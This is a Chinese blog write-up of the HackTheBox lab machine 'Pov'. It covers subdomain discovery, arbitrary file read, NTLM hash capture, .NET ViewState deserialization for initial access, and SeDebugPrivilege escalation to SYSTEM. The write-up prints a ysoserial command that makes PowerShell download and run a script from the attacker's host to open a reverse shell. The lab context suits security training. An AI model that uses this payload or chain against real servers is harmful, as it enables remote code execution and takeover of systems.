HackTheBox-Pov

端口扫描

TCP

image.png

WEB

网页没有发现链接,尝试爆破也没有发现内容。从网页的内容猜测可能存在一个monitor 的子域名。
image.png

虚拟主机爆破

image.png
发现了 dev.pov.htb
image.png

任意文件读取

Download CV 这里存在任意文件读取漏洞
image.png
但这里尝试读取 C 盘的内容失败(可能是姿势不对?求大佬指导)
image.png

捕获 NTLM Hash

image.png
image.png

尝试破解

失败
image.png

.NET 反序列化

详细:https://paper.seebug.org/1386/

获取 web.config

image.png

ysoserial

image.png

初次尝试

尝试访问自己的服务器
image.png

反弹 shell

1
./ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.46/ps/run64htb.txt')" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

执行
image.png
上线
image.png

提权

winPEAS

image.png

文件泄露密码

Documents 下找到 connection.xml 文件
获得 alaading 用户密码
image.png
但这个文件没有被 winPEAS 发现吗?于是我又跑了一遍
在 winPEAS 中被拆分识别成了 Token,以后要多看一眼文件名了。
image.png

powershell 获取密码

image.png

sliver runas 上线 alaading

image.png

SeDebugPrivilege 提权

image.png
存在 SeDebugPrivilege 权限,我们直接迁移到 winlogin 进程就能提权到 SYSTEM
image.png

flag 提交失败

1月31号的时候就打完了,但是 flag 一直提交失败。
这个老哥也遇到了同样的问题
image.png
2月1号又试了一下,这次问题就解决了。
image.png

Pentest
#HackTheBox
HackTheBox-Pov
http://aurey7.github.io.git/2024/02/04/Pov/
作者
Aurey7
发布于
2024年2月4日
许可协议